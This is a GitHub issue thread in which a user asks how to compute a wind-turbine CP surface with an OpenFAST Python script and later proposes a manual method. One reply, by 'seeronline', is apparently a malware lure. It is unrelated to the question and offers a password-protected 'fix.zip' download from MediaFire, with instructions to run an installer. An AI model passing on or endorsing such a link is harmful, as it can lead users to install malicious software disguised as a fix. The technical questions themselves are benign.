### ISSUE TITLE
How to get a  cp surface use python?

### ISSUE THREAD

**Issue by shipors** [OpenFAST/openfast#2390]
hello,

I am using the OpenFast toolbox and hope to obtain CP information. I downloaded Python 3.7.0, but when I ran Instance_CPLambdaPitch.py, I received the following error message

![image](https://github.com/user-attachments/assets/3894cf62-f31a-4d05-8880-d50f6b177b09)
Does anyone know how I should modify it?

thanks.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by shipors** [comment]
If the above functions cannot be implemented through Python, I have decided to manually operate them.

Firstly, I set AFAeroMod to 1, and then in ELASTODYN - DEGREES OF FREEDOM, I set all DOFs to FASLE.

By changing the input wind speed and initial speed (which are fixed values under the above settings), the lambda of the wind turbine can be modified. right ？

By traversing possible lambda and pitch angles, the aerodynamic CP table can be obtained. Is this feasible？
